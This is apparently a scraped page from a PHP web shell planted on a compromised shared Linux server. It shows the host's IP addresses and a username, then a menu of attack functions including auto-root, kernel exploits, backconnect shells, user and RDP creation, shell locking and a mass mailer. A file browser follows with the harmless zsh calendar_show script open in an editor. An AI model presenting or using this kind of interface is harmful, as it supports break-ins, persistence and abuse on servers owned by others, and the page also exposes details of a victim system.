Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
zsh /
functions /
Calendar /
[ HOME SHELL ]
Name
Size
Permission
Action
after
1.35
KB
-rw-r--r--
age
2.11
KB
-rw-r--r--
before
1.35
KB
-rw-r--r--
calendar
11.52
KB
-rw-r--r--
calendar_add
8.08
KB
-rwxr-xr-x
calendar_edit
794
B
-rw-r--r--
calendar_lockfiles
1.59
KB
-rw-r--r--
calendar_parse
5.97
KB
-rw-r--r--
calendar_read
1.24
KB
-rw-r--r--
calendar_scandate
28.47
KB
-rw-r--r--
calendar_show
1
KB
-rw-r--r--
calendar_showdate
1.43
KB
-rw-r--r--
calendar_sort
1.88
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : calendar_show
integer start=$1 stop=$2 shift 2 [[ -o zle ]] && zle -I print -r "$*" local -a cmd zmodload -i zsh/parameter || return # Use xmessage to display the message if the start and stop time # are the same, indicating we have been scheduled to display it. # Don't do this if there's already an notification/message for the same user. # HERE: this should be configurable and we should be able to do # better if xmessage isn't available, e.g. wish. if [[ -n $DISPLAY && $start -eq $stop ]]; then if [[ -n ${commands[kdialog]} && -n $KDE_SESSION_UID ]] then # We're in a KDE session, most probably. # Simple: cmd=(kdialog --msgbox) # Alternative: # calendar_knotify_show() { # dcop knotify default notify calendar zsh "$*" '' '' 2 0 # } # cmd=(calendar_knotify_show) elif [[ -n ${commands[xmessage]} ]]; then cmd=(xmessage -center) fi if [[ -n $cmd[1] ]] && ! ps -u$UID | grep $cmd[1] >/dev/null 2>&1; then # turn off job control for this ($cmd "$*" &) fi fi return 0
Close